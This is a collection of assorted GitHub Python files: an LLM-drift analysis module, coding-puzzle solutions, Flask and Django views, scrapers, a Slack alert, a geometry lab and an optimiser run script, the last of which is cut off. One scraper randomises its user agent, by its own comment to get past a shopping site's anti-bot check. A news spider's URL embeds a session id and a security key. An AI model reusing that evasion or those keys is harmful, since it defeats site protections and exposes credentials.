calculate_score, calculate_contain_score, eval_code, direct_usable, answer_wrong_question, match_score, calculate_contain_mc_score, calculate_boxed_score, clean_eval_code, executable, calculate_contain_mc_zshot_score\nfrom .utils import answer_survey_mc_score\nfrom .utils import format_answer_survey, format_answer_raw, format_answer_yesno, format_boxed, format_answer_em\n\nimport numpy, pandas\n\n_SCORE_MAP = {\n \"Accuracy\": calculate_contain_score,\n \"Code_Submit\":eval_code,\n \"Clean_Code_Submit\":clean_eval_code,\n \"Executable\":executable,\n \"Directly Executable\":direct_usable,\n \"Exact Match\":calculate_score,\n \"Answer Rate\":answer_wrong_question,\n \"Multiple-choice Accuracy\":calculate_contain_mc_score,\n \"Zeroshot-Multiple-choice Accuracy\":calculate_contain_mc_zshot_score,\n \"Math Accuracy\":calculate_boxed_score,\n \"Survey Rate\":answer_survey_mc_score,\n}\n\n_FORMAT_MAP = {\n \"Survey Rate\":format_answer_survey,\n \"Exact Match\":format_answer_raw,\n \"Multiple-choice Accuracy\":format_answer_survey,\n \"Accuracy\":format_answer_yesno,\n \"Math Accuracy\":format_boxed,\n}\n\n\n_NAME_MAP = {\n \"Accuracy\": \"Accuracy\",\n \"Code_Submit\":\"Code_Submit\",\n \"Clean_Code_Submit\":\"Clean_Code_Submit\",\n \"Executable\":\"Executable\",\n \"Directly Executable\":\"Directly EXE\",\n \"Exact Match\":\"Exact Match\",\n \"Answer Rate\":\"Response Rate\",\n \"Multiple-choice Accuracy\":\"Accuracy\",\n \"Math Accuracy\":\"Accuracy\",\n \"Zeroshot-Multiple-choice Accuracy\":\"Accuracy\",\n \"Survey Rate\":\"Response Rate\",\n}\n\nclass Analysis(object):\n def __init__(self,):\n return\n\n def format_answer(self,data,name):\n if name in _FORMAT_MAP:\n method = _FORMAT_MAP[name]\n if(name in _NAME_MAP):\n name = _NAME_MAP[name]\n if(not(name in data)):\n data[['format_ref_answer','format_answer']] = data.apply(lambda x: pandas.Series(method(x)), axis=1)\n return data \n return\n \n def get_verbosity(self,data):\n data['answer'] = data['answer'].astype(str)\n data['verbosity'] = data['answer'].apply(len)\n average_lengths = data.groupby('model')['verbosity'].mean()\n scores_std = data.groupby('model')['verbosity'].std(ddof=0) / numpy.sqrt(data.groupby('model').size())\n return average_lengths, scores_std\n\n def get_score(self,data,name):\n if name in _SCORE_MAP:\n method = _SCORE_MAP[name]\n if(name in _NAME_MAP):\n name = _NAME_MAP[name]\n if(not(name in data)):\n data[name] = data.apply(method,axis=1)\n scores = data.groupby('model')[name].mean()\n scores_std = data.groupby('model')[name].std(ddof=0) / numpy.sqrt(data.groupby('model').size())\n return scores, scores_std\n \n def get_overlap(self,data,models,name): \n filtered_df1 = data[data['model']==models[0]]\n filtered_df2 = data[data['model']==models[1]]\n merged_df = pandas.merge(filtered_df1, filtered_df2, on='id')\n if(name in _NAME_MAP):\n name = _NAME_MAP[name]\n merged_df['Answer Overlap'] = merged_df.apply(lambda row: match_score(row, name=name,), axis=1) \n scores = merged_df['Answer Overlap'].mean()\n scores_std = merged_df['Answer Overlap'].std(ddof=0) / numpy.sqrt(merged_df['Answer Overlap'].size)\n\n return scores, scores_std\n\n def get_mismatch(self,data,models,name): \n filtered_df1 = data[data['model']==models[0]]\n filtered_df2 = data[data['model']==models[1]]\n merged_df = pandas.merge(filtered_df1, filtered_df2, on='id')\n if(name in _NAME_MAP):\n name = _NAME_MAP[name]\n merged_df['Answer Mismatch'] = merged_df.apply(lambda row: 1-match_score(row, name=name,), axis=1) \n scores = merged_df['Answer Mismatch'].mean()\n scores_std = merged_df['Answer Mismatch'].std(ddof=0) / numpy.sqrt(merged_df['Answer Mismatch'].size)\n\n return scores, scores_std \n \n def get_code(self,data,name):\n if name in _SCORE_MAP:\n method = _SCORE_MAP[name]\n data[name] = data.apply(method,axis=1)\n return \n \n","repo_name":"lchen001/LLMDrift","sub_path":"src/analysis/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":4257,"program_lang":"python","lang":"en","doc_type":"code","stars":310,"dataset":"github-code","pt":"52"} +{"seq_id":"22086178952","text":"# User function Template for python3\nclass Solution:\n def countTriplet(self, arr, n):\n # code here\n count = 0\n hashmap = {\n i: None for i in arr\n }\n for i in range(len(arr)):\n for j in range(i + 1, len(arr)):\n if arr[i] + arr[j] in hashmap:\n count += 1\n return count\n\n# {\n # Driver Code Starts\n# Initial Template for Python 3\n\n\nif __name__ == '__main__':\n T = int(input())\n for i in range(T):\n n = int(input())\n arr = [int(x) for x in input().split()]\n\n ob = Solution()\n ans = ob.countTriplet(arr, n)\n print(ans)\n\n# } Driver Code Ends\n","repo_name":"strenuousnerd8/Code","sub_path":"GeeksForGeeks/CountTheTriplets.py","file_name":"CountTheTriplets.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"28020803242","text":"class Solution:\n def wordPattern(self, pattern: str, s: str) -> bool:\n p2s, s2p = {}, {}\n if len(pattern) != len(s.split()): return False\n for c, w in zip(pattern, s.split()):\n if (c in p2s and w not in s2p) or (c not in p2s and w in s2p):\n return False\n if c in p2s and w in s2p and not p2s[c] == w:\n return False\n p2s[c] = w\n s2p[w] = c\n return True\n","repo_name":"balwierz/LeetCode","sub_path":"290 Word Pattern.py","file_name":"290 Word Pattern.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8787265578","text":"from django.shortcuts import render, redirect\nfrom .models import aboutAdmin\nfrom pages.models import footerAdmin\n\ndef about(request):\n aboutAdmins = aboutAdmin.objects.all()\n footerAdmins = footerAdmin.objects.all()\n context = {\n 'aboutAdmins': aboutAdmins,\n 'footerAdmins':footerAdmins,\n }\n return render(request, 'pages/about.html', context)\n","repo_name":"rezmehp/abasian-peroject","sub_path":"about/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22053428286","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Apr 22 00:27:20 2018\n\n@author: pengsu\n\"\"\"\nimport kNN\nimport matplotlib.pyplot as plt\n#import Least_squares_fitting as lsf\nimport numpy as np\nfrom scipy import optimize\nk=0\nfig = plt.figure()\nax = fig.add_subplot(111)\nplt.xlabel('k')\nplt.ylabel('error')\nx = np.arange(0, 100, 1.0)\nx_list=[]\ny=[]\nfor i in range (0,100,1): \n k=k+1\n# print k\n s=kNN.datingClassTest(k)\n x_list.append(k)\n y.append(s)\n#print x\n#print y\nax.scatter(x,y)\n\n# linear fitting\n\"\"\"a0,a1 = lsf.linear_regression(x,y)\n_X = [0, 100]\n_Y = [a0 + a1 * m for m in _X]\n\nplt.plot(x, y, 'ro', _X, _Y, 'b', linewidth=2)\nplt.title(\"y = {} + {}x\".format(a0, a1))\nplt.show()\n\"\"\"\n# curve fitting\n\"\"\"\nA = lsf.gen_coefficient_matrix(x, y)\nb = lsf.gen_right_vector(x, y)\na0, a1, a2 = np.linalg.solve(A, b)\n_X = [0, 100]\n_Y = np.array([a0 + a1*m + a2*m**2 for m in _X])\nplt.plot(x, y, 'ro', _X, _Y, 'b', linewidth=2)\nplt.show()\n\"\"\"\ndef f_2(x,A,B,C):\n return A*x**2+B*x+C\n\nA2 , B2 , C2 =optimize.curve_fit(f_2, x_list ,y)[0]\nx2=np.arange(0,100,1.0)\ny2=A2*x2**2+B2*x2+C2\nplt.plot(x2,y2,'r',linewidth=2,)\ndef f_3(x,A,B,C,D):\n return A*x**3+B*x**2+C*x+D\nA3 ,B3 ,C3, D3 = optimize.curve_fit(f_3,x_list,y)[0]\nx3=np.arange(0,100,1.0)\ny3=A3*x3**3+B3*x2**2+C3*x2+D3\nplt.plot(x3,y3,'b',linewidth=2)","repo_name":"tossboyF91/test_for_Git","sub_path":"kNN/k_with_error_rate.py","file_name":"k_with_error_rate.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19359584195","text":"# -*- coding: utf-8 -*-\n\nimport json\nfrom datetime import datetime\nfrom scrapy import Request\nfrom news_all.spider_models import NewsRSpider\n\n\nclass RmtySpider(NewsRSpider):\n\n name = 'rmty' #人民体育客户端\n\n mystart_urls = {\n 'http://newsapi.people.cn/sports/content/getcontentlist?categoryid=36&categorytype=normal&systype=cms×tamp=0&maxid=&sinceid=&adcode=&isoCC=cn&city=%E5%8C%97%E4%BA%AC&device_product=Xiaomi&province=%E5%8C%97%E4%BA%AC&userid=1005030&network_state=wifi&MNC=07&client_ver=1.0.2&client_code=3&udid=869718026725165&MCC=460&visit_id=1531883457599&device_os=7.0&longitude=&sp=&visit_start_time=1531883457599&ctime=1531883457592&sessionId=2051ed02df0c4d8db45b5a4787570c78tTaGiCnq&platform=android&app_key=10_2016_12_89&device_size=1080.0x1920.0&district=&securitykey=5f959b725f44ac12f7519c2cf0fc7d95&device_model=Xiaomi-MI5s&latitude=&channel_num=xiaomi&citycode=': 1301120,\n # 人民体育客户端\n }\n\n def parse(self, response):\n rj = json.loads(response.text)\n result = rj.get('data', [])\n if not result:\n return self.produce_debugitem(response, 'json error')\n for i in result:\n link = i.get('group_data')\n for j in link:\n url = j.get(\"share_url\")\n title = j.get(\"title\")\n origin_name = \"\"\n pubtime = j.get(\"news_datetime\")\n\n yield Request(\n url=url,\n callback=self.parse_item,\n meta={'source_id': response.meta['source_id'], 'title': title, 'pubtime': pubtime,'origin_name':origin_name,\n 'start_url_time': response.meta.get('start_url_time'), 'schedule_time': response.meta.get('schedule_time')}\n )\n\n def parse_item(self, response):\n try:\n origin_name = response.xpath(\"//p[@class='info']/span[@class='source']/text()\").extract_first()\n content_div = response.xpath('.//div[@class=\"news-d-main\"]/div[@class=\"TRS_Editor\"]')[0]\n except:\n return self.parse_item_2(response)\n\n content, media, videos, video_cover = self.content_clean(content_div)\n return self.produce_item(\n response=response,\n title=response.request.meta['title'],\n pubtime=response.request.meta['pubtime'],\n origin_name=response.request.meta['origin_name'],\n content=content,\n media=media,\n videos=videos,\n )\n\n def parse_item_2(self, response):\n # http://dsimg.people.cn/data/rmtyimg/2019/06/12/cms_3253096666235904.html\n try:\n origin_name = response.xpath(\"//span[@class='source']/text()\").extract_first()\n content_div = response.xpath('//div[@class=\"article\"]')[0]\n except:\n return self.parse_item_3(response)\n\n content, media, videos, video_cover = self.content_clean(content_div)\n return self.produce_item(\n response=response,\n title=response.request.meta['title'],\n pubtime=response.request.meta['pubtime'],\n origin_name=response.request.meta['origin_name'],\n \n content=content,\n media=media,\n videos=videos,\n )\n\n def parse_item_3(self, response):\n # http://dsimg.people.cn/data/rmtyimg/2019/06/10/cms_3250203358184448.html\n try:\n origin_name = response.xpath(\"//span[@class='source']/text()\").extract_first()\n content_div = response.xpath('//div[@class=\"img_slide_block\"]')[0]\n except:\n return self.produce_debugitem(response, \"xpath error\")\n\n content, media, videos, video_cover = self.content_clean(content_div)\n return self.produce_item(\n response=response,\n title=response.request.meta['title'],\n pubtime=response.request.meta['pubtime'],\n origin_name=response.request.meta['origin_name'],\n \n content=content,\n media=media,\n videos=videos,\n )","repo_name":"Pintrue/news_all","sub_path":"news_all/spiders_old/rmty_all.py","file_name":"rmty_all.py","file_ext":"py","file_size_in_byte":4090,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"8016742069","text":"import requests\n\nimport json\n\nimport configparser\n\n\ndef send_alert(hostname, days):\n\n\n config = configparser.ConfigParser()\n\n config.read('/etc/tls_monitor/config.cfg')\n\n CHANNEL = config['SLACK']['CHANNEL']\n USERNAME = config['SLACK']['USERNAME']\n EMOJI = config['SLACK']['EMOJI']\n INCOMING_WEBHOOK = config['SLACK']['INCOMING_WEBHOOK']\n\n json_message = {\n 'channel': CHANNEL,\n 'username': USERNAME,\n 'icon_url': EMOJI,\n 'attachments': [\n {\n 'title': \"ALERT: {}\".format(hostname),\n 'color': 'danger',\n 'fallback': 'Certificate Expiring',\n 'text': \"The TLS certificate for {} expires in {}\".format(hostname, days)\n }\n ]\n }\n requests.post(INCOMING_WEBHOOK, data=json.dumps(json_message), headers={'Content-Type': 'application/json'})","repo_name":"imm-llc/scriptcity-public","sub_path":"cert-expiry-check/slack_alert.py","file_name":"slack_alert.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13314640396","text":"import sort\n\n\ndef load_database(filename):\n \"\"\"Takes in a file, filename, and creates it if the filename does not\n already exist. If the file does exist, it opens the file and returns\n a dictionary with the file's contents.\"\"\"\n dic = {}\n myfile = open(filename, \"a\")\n myfile.close()\n with open(filename, 'r') as f:\n for line in f:\n [user, singers] = line.strip().split(\":\")\n singersList = singers.split(\",\")\n dic[user] = singersList\n return dic\n\n\ndef save_database(dic, filename):\n \"\"\"Takes in a dictionary and the file you want to save the dictionary to.\n The updated dictionary is then transferred back to the file in the same\n format as before.\"\"\"\n keyList = list(dic.keys())\n sort.sort(keyList)\n myfile = open(filename, 'w')\n for item in keyList:\n string = item + \":\"\n for s in dic[item]:\n string += s + ','\n string = string[:-1] + \"\\n\"\n myfile.write(string)\n","repo_name":"Winner-exe/GroupProject","sub_path":"database_loader.py","file_name":"database_loader.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25453440339","text":"import os\nimport pwd\nimport glob\nimport time\n\nfrom . import config\n\n\ndef active_users(tty_conf):\n \"\"\"\n Return list of active users which are not in whitelist\n :param tty_conf: TtyConfiguration instance\n :return: list of active user names\n \"\"\"\n assert isinstance(tty_conf, config.TTYConfiguration)\n\n result = []\n if not tty_conf.enabled:\n return result\n\n for pts_name in glob.glob(\"/dev/pts/*\"):\n st = os.stat(pts_name)\n uname = pwd.getpwuid(st.st_uid).pw_name\n if uname in tty_conf.whitelist:\n continue\n if uname in result:\n continue\n idle_time = time.time() - st.st_atime\n if idle_time < tty_conf.idle_seconds:\n result.append(uname)\n return result\n","repo_name":"Shmuma/gpu_mon","sub_path":"gpu_mon/tty.py","file_name":"tty.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":104,"dataset":"github-code","pt":"52"} +{"seq_id":"26684430155","text":"from flask import Blueprint, session, request\nfrom app.forms import ChannelForm\nfrom app.models import Channel, db\n\nchannel_routes = Blueprint('channels', __name__)\n\n@channel_routes.route('/')\ndef channels():\n '''\n GET all channels\n '''\n channels = Channel.query.all()\n return {\"channels\": [channel.to_dict() for channel in channels]}\n\n\n@channel_routes.route('/server/')\ndef channels_serverId(id):\n '''\n GET all channels based on server id\n '''\n channels = Channel.query.filter(Channel.server_id == id).all()\n return {\"channels\": [channel.to_dict() for channel in channels]}\n\n\n@channel_routes.route('/category/')\ndef channels_categoryId(id):\n '''\n GET all channels based on category id\n '''\n channels = Channel.query.filter(Channel.category_id == id).all()\n return {\"channels\": [channel.to_dict() for channel in channels]}\n\n\n@channel_routes.route('/', methods=[\"POST\"])\ndef post_channel():\n '''\n CREATE a channel\n '''\n form = ChannelForm()\n form['csrf_token'].data = request.cookies['csrf_token']\n\n print('-------FORM DATA-------: ', form.data)\n\n if form.validate_on_submit():\n channel = Channel(\n title=form.data['title'],\n category_id=form.data['category_id'],\n server_id=form.data['server_id']\n )\n db.session.add(channel)\n db.session.commit()\n return channel.to_dict()\n return {'errors': validation_errors_to_error_messages(form.errors)}, 401\n\n\n@channel_routes.route('/', methods=[\"DELETE\"])\ndef delete_channel(id):\n '''\n DELETE a channel\n '''\n channel = Channel.query.get(id)\n db.session.delete(channel)\n db.session.commit()\n return channel.to_dict()\n\n\n@channel_routes.route('/', methods=[\"PUT\"])\ndef edit_channel(id):\n '''\n EDIT a channel\n '''\n form = ChannelForm()\n channel = Channel.query.get(id)\n channel.title = form.data['title']\n db.session.commit()\n return channel.to_dict()\n","repo_name":"keithmellea/Accord","sub_path":"app/api/channel_routes.py","file_name":"channel_routes.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"52"} +{"seq_id":"13571091725","text":"# Import required libraries \nimport sqlite3 \nimport pandas as pd \nimport spatialite\n\n# Connect to SQLite database \nconn = sqlite3.connect(r'californiadisasters.sqlite') \n \n# Load CSV data into Pandas DataFrame \nfire_db = pd.read_csv('clean_fire.csv') \n# Write the data to a sqlite table \nfire_db.to_sql('WILDFIRES', conn, if_exists='replace', index=False) \n \n# Create a cursor object \ncur = conn.cursor() \n\n# # Fetch and display result \n# for row in cur.execute('SELECT * FROM WILDFIRES'): \n# print(row) \n\n# Load CSV data into Pandas DataFrame \nearthquake_db = pd.read_csv('California_EarthQuake.csv') \n# Write the data to a sqlite table \nearthquake_db.to_sql('EARTHQUAKES', conn, if_exists='replace', index=False) \n \n# # Fetch and display result \n# for row in cur.execute('SELECT * FROM EARTHQUAKES'): \n# print(row) \n\n# Load CSV data into Pandas DataFrame \ncounties_db = pd.read_csv('County_Boundaries.csv') \n# Write the data to a sqlite table \ncounties_db.to_sql('COUNTIES', conn, if_exists='replace', index=False) \n \n# # Fetch and display result \n# for row in cur.execute('SELECT * FROM COUNTIES'): \n# print(row) \n\n# Create the view which has a single coordinate for the Earthquake Data\ncur.execute('DROP VIEW IF EXISTS VW_EARTHQUAKE')\ncur.execute(\"CREATE VIEW VW_EARTHQUAKE AS SELECT EARTHQUAKES.place, EARTHQUAKES.time, EARTHQUAKES.magnitude, EARTHQUAKES.depth, ('[' + EARTHQUAKES.Latitude + ',' + EARTHQUAKES.Longitude + ']') AS coordinate FROM EARTHQUAKES\")\n\n# # Fetch and display result \n# for row in cur.execute('SELECT * FROM VW_EARTHQUAKE'): \n# print(row) \n\n# Create the view that does the geospacial join to grab the county each earthquake was\ncur.execute('DROP VIEW IF EXISTS VW_SPATIAL_EARTHQUAKE')\ncur.execute('CREATE VIEW VW_SPATIAL_EARTHQUAKE AS SELECT VW_EARTHQUAKE.place, COUNTIES.County, VW_EARTHQUAKE.time, VW_EARTHQUAKE.magnitude, VW_EARTHQUAKE.depth, VW_EARTHQUAKE.coordinate FROM COUNTIES INNER JOIN VW_EARTHQUAKE ON COUNTY.polygon.STIntersects(VW_EARTHQUAKE.coordinate) = 1')\n\n# # Fetch and display result \n# for row in cur.execute('SELECT * FROM VW_SPATIAL_EARTHQUAKE'): \n# print(row) \n\n# Close connection to SQLite database \nconn.close()","repo_name":"kehull/Project-2","sub_path":"data/CreateSQL.py","file_name":"CreateSQL.py","file_ext":"py","file_size_in_byte":2188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26491853061","text":"import requests\nfrom fake_useragent import UserAgent\nua=UserAgent()\nheaders={\"user-agent\":ua.random}\nurl=\"https://www.momoshop.com.tw/main/Main.jsp\"\nr=requests.get(url,headers=headers)\nprint(r.status_code)#200:成功\nprint(r.text)\n\n\"\"\"\"\"\"\"\"\"\nif (r=requests.get(url))--->出现错误\n because有防爬机制,网站侦测到不为浏览器,故拒绝连线\n\"\"\"\"\"\"\"\"\"","repo_name":"PeiYun722/MyPythonExercise","sub_path":"Myweb/spider__fake_useragent_momo.py","file_name":"spider__fake_useragent_momo.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73651782564","text":"from uniclass import UniClass\nfrom schedule import get_schedules, get_rooms\nimport datetime as dt\nfrom pprint import pprint\n\n\nclass Repository:\n\n data = []\n\n def __init__(self, semester, uni_year):\n self.semester = semester\n self.uni_year = uni_year\n current_year = dt.datetime.now().year\n calendar_year = current_year if semester == 1 else current_year - 1\n schedules = get_schedules(\n f\"http://www.cs.ubbcluj.ro/files/orar/{calendar_year}-{self.semester}/tabelar/IG{self.uni_year}.html\")\n for schedule in schedules:\n for uni_class in schedule:\n uni_cls = UniClass(uni_class['Disciplina'], uni_class['Formatia'], uni_class['Frecventa'], uni_class['Orele'].split(\n '-')[0], uni_class['Orele'].split('-')[1], get_rooms(uni_class['Sala']), uni_class['Tipul'], uni_class['Ziua'])\n if uni_cls not in self.data:\n self.data.append(uni_cls)\n","repo_name":"andreicorpo/ubb_IG_python_schedule_script","sub_path":"repository.py","file_name":"repository.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42096550949","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Feb 16 16:39:38 2016\r\n\r\n@author: Konstantin\r\n\"\"\"\r\n\r\n\"\"\" Програма для визначення точки перетину двох відрізків і визначення кута\r\n між двома відрізками\"\"\"\r\n\r\nimport numpy\r\nfrom math import sqrt, acos, degrees\r\neps = 10**-6\r\n\r\nclass Segment: #описывает класс отрезка на плоскости\r\n def __init__(self,x1,y1,x2,y2): # в качестве первой точки выбирается либо самая левая,\r\n self.parralell_to_Oy = False\r\n if x1x2:\r\n self.x1 = x2\r\n self.y1 = y2\r\n self.x2 = x1\r\n self.y2 = y1\r\n else:\r\n self.parralell_to_Oy = True\r\n if y1>=y2:\r\n self.x1 = x1\r\n self.y1 = y1\r\n self.x2 = x2\r\n self.y2 = y2\r\n else:\r\n self.x1 = x2\r\n self.y1 = y2\r\n self.x2 = x1\r\n self.y2 = y1\r\n\r\n self.A=self.y2-self.y1 # считает уравнение прямой\r\n self.B=-(self.x2-self.x1)\r\n self.C=-self.x1*(self.y2-self.y1)+self.y1*(self.x2-self.x1)\r\n\r\n self.x= self.x2-self.x1 #считает координаты вектора\r\n self.y=self.y2-self.y1\r\n\r\n def __str__(self):\r\n return \"((\" + str(self.x1)+\",\"+str(self.y1)+\"),(\" +str(self.x2)+\",\"+str(self.y2)+\"))\"\r\n\r\n def is_parrarel(self, segm): #находятся ли отрезки на паралельные линиях\r\n return numpy.linalg.det([[self.A, self.B], [segm.A, segm.B]])==0\r\n def is_same(self,segm): #находятся ли отрезки на одной линии\r\n return numpy.linalg.det([[self.A, self.C], [segm.A, segm.C]])==0 and numpy.linalg.det([[self.B, self.C], [segm.B, segm.C]])==0\r\n def point_in(self,x,y): # проверка, принадлежит ли точка отрезку\r\n #проверка отдельно по оси X (точка х1 всегда меньше x2), и отдельно по оси Y.\r\n \r\n \r\n return self.x1-eps<=x<=self.x2+eps and (self.y1-eps<=y<=self.y2+eps or self.y1+eps>=y>=self.y2-eps)\r\n\r\n def intersect(self, segm):\r\n if self.is_point() and segm.is_point(): #если оба отрезка выражены в точку\r\n return self.intersect_points(segm)\r\n elif self.is_point(): #если первый отрезок выраженый в точку\r\n return segm.intersect_with_point(self.x1,self.y1)\r\n elif segm.is_point(): #если второй отрезок выражен в точку\r\n return self.intersect_with_point(segm.x1, segm.y1)\r\n else:\r\n if self.is_parrarel(segm): #если прямые, построенные на отрезках паралельны\r\n if self.is_same(segm): # и совпадают\r\n return self.find_intersected_segm_on_same_line(segm)\r\n else: #если паралельны и не совпадают\r\n return False\r\n else: #если не паралельны, ищем точку пересечения\r\n point = self.line_intersect(segm)\r\n if self.point_in(point[0],point[1]) and segm.point_in(point[0],point[1]):\r\n return point\r\n else:\r\n return False\r\n\r\n def line_intersect(self, segm): #возвращает точку пересечения двух прямых\r\n X = -numpy.linalg.det([[self.C, self.B], [segm.C, segm.B]])/numpy.linalg.det([[self.A, self.B], [segm.A, segm.B]])\r\n Y = -numpy.linalg.det([[self.A, self.C], [segm.A, segm.C]])/numpy.linalg.det([[self.A, self.B], [segm.A, segm.B]])\r\n print (X,Y)\r\n return(X,Y)\r\n\r\n def is_point(self): # проверяет, производится ли отрезок в точку\r\n return self.x1==self.x2 and self.y1==self.y2\r\n\r\n def intersect_points(self, segm): # совпадают ли две точки\r\n if self.x1==segm.x1 and self.y1 == segm.y1:\r\n return (self.x1,self.y1)\r\n else:\r\n return False\r\n\r\n def intersect_with_point(self, X,Y): # пересечь отрезок и точку\r\n if self.A*X+self.B*Y+self.C==0:\r\n if self.point_in(X,Y):\r\n return (X,Y)\r\n else:\r\n return False\r\n else:\r\n return False\r\n\r\n def find_intersected_segm_on_same_line(self,segm): # найти пересечение отрезков, если они на одной line\r\n if self.parralell_to_Oy: #если линия, на которой находятся оба отрезка, паралельна оси Y\r\n if self.y1segm.y1:\r\n #если не совпадают\r\n return False\r\n elif self.y1==segm.y2: #если пересекаются по одной точке\r\n return (self.x1,self.y1)\r\n elif segm.y1==self.y2: #если пересекаются по второй точке\r\n return (segm.x1,segm.y1)\r\n else:\r\n return ((self.x1, min(self.y1,segm.y1)),(self.x1,max(self.y2,segm.y2)))\r\n else: #все остальные случаи\r\n if self.x1>segm.x2 or self.x20:\r\n return degrees(acos(cos_between_vectors))\r\n else:\r\n return 360-degrees(acos(cos_between_vectors))\r\n\r\n\r\n\r\n\r\ns1 = Segment(-1,2,1,4)\r\ns2 = Segment(-2,3,4,5)\r\nprint(s1, \" пересекается с \", s2, \" в \", s1.intersect(s2))\r\n#print(\"Угол между \", s1, \" и \", s2, \" равен \", s1.find_angle(s2))\r\n#s3 = Segment(2,2,3,3)\r\n#print(s1, \" пересекается с \", s3, \" в \", s1.intersect(s3))\r\n#s4=Segment(1,0,1,3)\r\n#print(s2, \" пересекается с \", s4, \" в \", s2.intersect(s4))\r\np1=Segment(-5.00000000000001,2,1,4)\r\np2=Segment(-2,3,4,5)\r\nprint(\"Угол между \", p1, \" и \", p2, \" равен \", p1.find_angle(p2))\r\n\r\n#\r\n","repo_name":"KonstantinPristavskiy/geometry-lab-1","sub_path":"comp_geometry_lab1.py","file_name":"comp_geometry_lab1.py","file_ext":"py","file_size_in_byte":7748,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9320826989","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nimport random\n# import os\n# import torch\n# import math\n# import matplotlib\n# import matplotlib.pyplot as plt\nimport functions.synthetic as synthetic\nfrom copy import deepcopy\nimport argparse\nimport scipy\nfrom scipy import optimize\nimport time\nimport re\n\n\n# python run.py --func=Ackley --dim=100 --method=AIBO_mixed-grad-UCB1.96 --iters=5000 --device=cpu\n# python run.py --func=Ackley --dim=100 --method=AIBO_random-grad-UCB1.96 --iters=5000 --device=cpu\n\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--func', help='specify the test function')#, choices=func_choice\nparser.add_argument('--dim', type=int, help='specify the problem dimensions')\nparser.add_argument('--method',default='AIBO_mixed-grad-EI')#, choices=method\nparser.add_argument('--batch-size', type=int, default=10)\nparser.add_argument('--iters', type=int, help='Total evaluation budget')\nparser.add_argument('--istrackAF', type=bool, default=False)\nparser.add_argument('--istrackcands', type=bool, default=False)\nparser.add_argument('--device', default='cpu')\nparser.add_argument('--dtype', default='float64')\nparser.add_argument('--verbose',type=bool, default=False)\nparser.add_argument('--popsize',type=int, default=50)\n\nargs = parser.parse_args()\n\n\nif args.func in ['Ackley', 'Levy', 'Rastrigin', 'Rosenbrock', 'Griewank']:\n f_class = eval(f'synthetic.{args.func}')\n f = f_class(dim =args.dim, foldername=f'{args.method}-{args.batch_size}', verbose=args.verbose)\n fname = f'{args.func}{args.dim}'+'/'+f'{args.method}-{args.batch_size}'\n\nelif args.func == 'Robotpush': \n import functions.robot_push as robot_push\n f = robot_push.PushReward(method=f'{args.method}-{args.batch_size}', verbose=args.verbose)\n fname = 'RobotPush14'+'/'+f'{args.method}-{args.batch_size}'\nelif args.func == 'Rover': \n import functions.rover as rover\n f = rover.Rover(method=f'{args.method}-{args.batch_size}', verbose=args.verbose)\n fname = 'Rover60'+'/'+f'{args.method}-{args.batch_size}'\nelif args.func == 'HalfCheetah': \n import functions.mujoco as mujoco\n f = mujoco.HalfCheetah(method=f'{args.method}-{args.batch_size}', verbose=args.verbose)\n fname = 'HalfCheetah102'+'/'+f'{args.method}-{args.batch_size}'\n\n \n# elif args.func == 'synt_hard': \n# import functions.lasso as lasso\n# f = lasso.LassoBenchFunction(method=args.method, noise=False)\n# elif args.func == 'synt_hard_noise': \n# import functions.lasso as lasso\n# f = lasso.LassoBenchFunction(method=args.method, noise=True)\nelse:\n raise Exception('function not defined')\n\n\nif args.method.startswith('AIBO'): # 'AIBO_mixed-es-UCB1.96'\n from AIBO.AIBO import AIBO\n \n _, initialization_mode, acqf_maxmizer, acqf_mode = re.split('_|-', args.method)\n if initialization_mode == 'mixed':\n acqf_initializer={\"random\":{},\"cmaes\":{'sigma0':0.2},\"ga\":{'pop_size':args.popsize}}\n elif initialization_mode == 'ga':\n acqf_initializer={\"ga\":{'pop_size':args.popsize}}\n elif initialization_mode == 'cmaes':\n acqf_initializer={\"cmaes\":{'sigma0':0.2}}\n elif initialization_mode == 'random':\n acqf_initializer={\"random\":{}}\n else:\n assert 1==0, 'select a correct initialization_mode'\n if acqf_mode.startswith('UCB'):\n beta = float(acqf_mode[3:])\n acqf_mode = 'UCB'\n else:\n beta = None\n\n t0=time.time()\n AIBO = AIBO(\n f=f, # Handle to objective function\n fname=fname,\n lb=f.lb, # Numpy array specifying lower bounds\n ub=f.ub, # Numpy array specifying upper bounds\n n_init=50,\n max_evals = args.iters, # Maximum number of evaluations\n batch_size = args.batch_size,\n n_init_acq=500,\n max_acq_size=256,\n n_restarts_acq=1,\n acqf_mode = acqf_mode,\n beta=beta,\n initial_guess = None,\n acqf_maxmizer = acqf_maxmizer,\n acqf_initializer = 